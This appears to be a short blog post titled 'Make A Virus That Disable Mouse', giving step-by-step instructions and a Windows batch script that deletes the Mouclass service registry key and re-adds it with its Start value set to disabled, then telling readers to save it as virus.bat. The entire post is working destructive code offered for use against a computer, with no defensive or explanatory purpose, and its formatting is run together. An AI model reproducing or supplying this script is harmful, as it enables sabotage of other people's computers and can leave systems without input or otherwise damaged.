Make A Virus That Disable Mouse
1. OpenNotepadand copy below codesrem ---------------------------------rem Disable Mouseset key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4rem ---------------------------------2. Save this file asvirus.bat3. Done you just created your virus.
Post a Comment